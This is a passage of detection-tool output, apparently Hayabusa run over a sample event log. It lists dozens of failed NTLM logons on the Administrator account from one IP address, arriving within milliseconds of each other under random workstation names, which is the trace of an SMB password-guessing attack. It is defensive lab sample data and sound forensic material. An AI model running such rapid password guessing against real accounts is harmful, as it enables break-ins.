01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSHnvxa0khWdWBVx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bJkPp0bghDCPYz52 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SfHRWGXjCej9HSPb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X42H7EvrvzsRqXWO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: moo42NdOq30Gnz3T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A4NHVYxxDkCOsQw8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iPUiW0vFQB405kwS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OtcZ4ymkeLHeU7YJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZxZCDKWtqkGJ0dnw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f4GGnhttZgmRPRJo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gI0j9w45eXEFeex3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BVZ2YRDUAOsNgKxo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJfIpxlcwVf7pWga : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Oerixd9ODF6fslsC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbJC5yvrIymYgaHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.951 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4schZcUP8Im8Ee1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WotargyGlEq9PBch : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2JSMrPoucOR0nzlD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jr4w4uoF2DVZ5n9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v319oZIaOBpuf542 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GNRTL9BLlGWMx6dA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zHlDIOZ9B5uY8Rzz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dr2bvAue8mr5kagX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXBds9GoXr6IZUfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aLYuegjXO18lo342 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: To3MMEEvNXKNjKHT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N0HCToTmh3ESGBYt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nNvBueVo3ANNmSSN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mVWOoAG5ermGL2Gl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W7QYJUNPm5b4jprh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PHllwNJvpH3P97cp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tfT8GtafHGYMlkMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nab7wtZfBVkcynsa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:04.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHiijj7sT9nyqxii : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v06kkhqYNOyEHx2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WSTDX16YK5Zgkjxo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u6QWEyTrpndCagP0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7iCaXa5SR5IHJnQA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:04.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DNZhcPd1JaNFZMYG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LeOIg10KS60QplWz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: um3Nwo2doDbKJJvz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JuoqbUwc2Nth1xlH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.199 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WF8zKIbeboTLLkC6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kSyKc8igfuYLMekV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:05.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LHog0TdOci9CCKBa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R5ilFaQlemZUSNun : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JOJnv9vFdqr2VSQC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rXaoVN7FvJ5rRDUF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.482 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kaFCT5QYFfmJpEC1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kOdVfL4XUTLp60tC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wFQSXjz0JTlkwpBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.634 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgAVlnENp6IzRRDr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JLkeKKFVP5vJjPtl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EqLXdGmr45vGpu3E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m7uTpMLqPgenJdRb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:05.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FQn7NqRzpGtjQdfv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8F8EZLHQtEWkeob1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5joxW81M9vcAfbJw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:05.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iMfmQF3xsaV5SQVZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQe9VL8eeco0SdPW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MnMbxQEuczrnMLKc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3DWOiTIp6JQLq9Vz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E1ORteg467kiFxmD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EoVhHZ2lkyAEx0w9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMSqYaVVGR5v3bXr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hEEJ05nL0lyatWKL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:06.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SgrcS1NqwVJSEv31 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.395 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CCNTu1A6c6myngXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YLx5Hv5GmdvsO9SE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtS3KUkTVoAWGqbW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7DxfDEwc6ykrmddu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m8yKyocZwOY574pe : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfdmcsxnDHRxJYAA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: euxBOcdse8NjSzTd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dw7RZh5jKuRcM1xw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:06.742 